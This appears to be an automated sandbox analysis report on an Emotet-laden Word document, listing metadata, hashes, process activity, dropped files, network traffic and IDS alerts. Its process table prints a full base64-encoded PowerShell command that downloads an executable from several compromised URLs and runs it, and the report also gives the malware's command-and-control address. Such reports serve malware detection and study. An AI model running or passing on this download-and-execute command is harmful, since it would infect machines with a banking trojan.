File name: | YBN 9-34007184.doc |
Full analysis: | https://app.any.run/tasks/64a4b5e9-a113-4aa2-a6fb-176a7f14eda0 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 16:27:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Clothing, Home & Home, Subject: Expanded, Author: Doris Bernier, Keywords: Director, Comments: B2B, Template: Normal.dotm, Last Saved By: Autumn Schinner, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 09:04:00 2019, Last Saved Time/Date: Mon Oct 14 09:04:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 171, Security: 0 |
MD5: | 42A9AC774E9D9C7441902707AA4D18D6 |
SHA1: | 5B91A117CDDE664D539D3E3373FC7A23A2D475E6 |
SHA256: | AAACB4245B5148A8AEBAC72ACA353C26F6416244245F1133FC970EEAD5A09263 |
SSDEEP: | 6144:aaHde0oWHKUzSOnLx33DhNJJeCznfCLMcbrMN:aaHdeGqUGOt3ZJeRH |
.doc | | | Microsoft Word document (34.5) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (20.5) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Flatley |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 200 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Rath - Schneider |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 171 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:14 08:04:00 |
CreateDate: | 2019:10:14 08:04:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Autumn Schinner |
Template: | Normal.dotm |
Comments: | B2B |
Keywords: | Director |
Author: | Doris Bernier |
Subject: | Expanded |
Title: | Clothing, Home & Home |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\YBN 9-34007184.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2960 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeAAyAGIAMQBjADMAMgAwAGQAMAAzADIAMwAyADUAPQAnAGEAMAB4AGQAMwA1AGIAOABmAGUAOQA2ADMAZQBlADMAJwA7ACQAYQAwAHgAMQBmAGUAZgA0ADEAMAA5ADkAYwA5ADQANAA5ACAAPQAgACcANgAzADgAJwA7ACQAYQAwAHgAOQAxAGMAZQAyADcANgBmAGYAZgAxAD0AJwBhADAAeABmAGMANwA0ADYAOQA3ADEANAA5AGQAMgBjACcAOwAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBmAGUAZgA0ADEAMAA5ADkAYwA5ADQANAA5ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYANAAxADkAOABjADkAMQA1ADcAMwA5AD0AJwBhADAAeAA2AGIANwBmAGUAYQA5AGIAOQA4AGEAMAAnADsAJABhADAAeABiADkAOQBjADMANwBhAGUAMAAwAD0AJgAoACcAbgBlACcAKwAnAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAVAAuAFcARQBCAEMAbABJAGUAbgB0ADsAJABhADAAeABhADAAZgBkADEAZQBkADMAMABhAD0AJwBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBTAFMAQQBuAE0ATgBnAFcAYgA4AC8AKgBoAHQAdABwADoALwAvAGMAaAB1AGEAdgBpAGUAbQB4AG8AYQBuAGcAeQBkAHUAYwAuAGMAbwBtAC8AcQA1AGoAaAA4AGQALwBQAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYgBvAG0AcABhAHMALgBmAHIALgBtAGkAYQBsAGkAYQBzAC4AbgBlAHQALwB3AHAALwBvAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZwBlAG8AZQB4AHAAZQByAHQALgBnAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBrADYAbQAvACoAaAB0AHQAcAA6AC8ALwByAHMAdQBkAHMAdQBrAGEALgBkAGUAbQBhAGsAawBhAGIALgBnAG8ALgBpAGQALwBlAHIAcgBvAHIALwBhAHYAMwAzAC8AJwAuACIAcwBgAHAAbABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADcAZgBiADUAZgAwAGYAYQBkADcANwAzAD0AJwBhADAAeAAyAGQAMgBmADAAYwBkAGQANQAzAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4AGMAZgA1ADkANAA2ADQAYQAxADYANwBhADcAIABpAG4AIAAkAGEAMAB4AGEAMABmAGQAMQBlAGQAMwAwAGEAKQB7AHQAcgB5AHsAJABhADAAeABiADkAOQBjADMANwBhAGUAMAAwAC4AIgBEAE8AdwBgAE4AbABvAGEAZABmAGAAaQBsAEUAIgAoACQAYQAwAHgAYwBmADUAOQA0ADYANABhADEANgA3AGEANwAsACAAJABhADAAeABiADYAZAA3AGEAZABjAGIAMgA2ADIAMABlADkAKQA7ACQAYQAwAHgANABhADkAZgA3ADYANAA5ADUAYgA9ACcAYQAwAHgANgA0AGIAZQAwADgAYQA0AGYAOQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQApAC4AIgBsAEUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMgA2ADEANwAzACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABBAGAAUgB0ACIAKAAkAGEAMAB4AGIANgBkADcAYQBkAGMAYgAyADYAMgAwAGUAOQApADsAJABhADAAeABhADAAOQA3AGEAOQA4ADcAMQAzAGIAPQAnAGEAMAB4AGYAZAAwADAAYwAxADUANQBhADcAMQBmADUAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAOQBkAGEAZQA0ADQANgBjAGQAZgBjADMANgA4AD0AJwBhADAAeAA4ADgAYwAzAGUAZABhAGYANAA2ADEANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeABkADIAOAA1ADEAMgBmADMAOQAwADMAMQAwAGUAPQAnAGEAMAB4ADcAZQA2ADQAZAAyADcANQBmAGQAMwA0ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2328 | "C:\Users\admin\638.exe" | C:\Users\admin\638.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
292 | --1053a279 | C:\Users\admin\638.exe | 638.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
2248 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 638.exe |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Exit code: 0 Version: 1, 0, 0, 1 | ||||
3884 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | |
User: admin Integrity Level: MEDIUM Description: DirectoryBrowse MFC Application Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB84E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2960 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U8V5B8RA6IU218I4DTZ9.temp | — | |
MD5:— | SHA256:— | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F26B55D.wmf | wmf | |
MD5:30A215A27AE2AB584C29CE4E580D0814 | SHA256:F1B3EBDAF3A68285085F89128C094A6CBA7426816B8C7E4668ACA0472BE92D89 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\472371F9.wmf | wmf | |
MD5:5696936CE100EA665CE703452F8A0E60 | SHA256:019DBFA386E9CC8AB76C7F78CFAAD84DE27C81B560EA768D36AC6879B2AA0EC3 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED1F6F.wmf | wmf | |
MD5:04CC70408F71C7242331B9D50EF33D05 | SHA256:6316C273DA57A0DC2D48F7AB49F5CCA6D8650E12E858FB2364D4276F50080B9C | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$N 9-34007184.doc | pgc | |
MD5:E5EAE432FB13BF6C31BB10AAA7F687AD | SHA256:0E5D736D109D160D1E0882B533D5B6BF427BBA5B85A45272CD435BC7C4C48676 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:23EEFE93E31E49C5466F2B42B2238736 | SHA256:DA5D6C01F488C7445467C2ABA77AA1B9C8B6EAC87C5743192C7ABDB032CB8EE8 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F12C8C73.wmf | wmf | |
MD5:E528DCA40F1289B1CF3A9924C8E7A53A | SHA256:F0211BD84CDB9A9F777BCCA31A4FC3C047B0300A5B88CF50DB660E512A5AB645 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74F43BA.wmf | wmf | |
MD5:CE43F1FAC623BBC22C924624C31BF65B | SHA256:244A3D4B24DDA0A0FAEC64647C2197C7384FA976E4BD883BF50A993D8E94E8FE | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B673F3D8.wmf | wmf | |
MD5:3D85CB8DB19F871BFAB7D2E13347CBB7 | SHA256:E757A558435B96E8A65C4299276A3EB8CF323152BA1DA6A2A9B836CDE01218DE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3884 | msptermsizes.exe | POST | 200 | 200.51.94.251:80 | http://200.51.94.251/child/bml/add/ | AR | binary | 132 b | malicious |
2960 | powershell.exe | GET | 200 | 162.144.93.20:80 | http://deredia.com/cgi-bin/SSAnMNgWb8/ | US | executable | 536 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2960 | powershell.exe | 162.144.93.20:80 | deredia.com | Unified Layer | US | suspicious |
3884 | msptermsizes.exe | 200.51.94.251:80 | — | Telefonica de Argentina | AR | malicious |
Domain | IP | Reputation |
---|---|---|
deredia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2960 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2960 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2960 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3884 | msptermsizes.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 15 |
3884 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3884 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |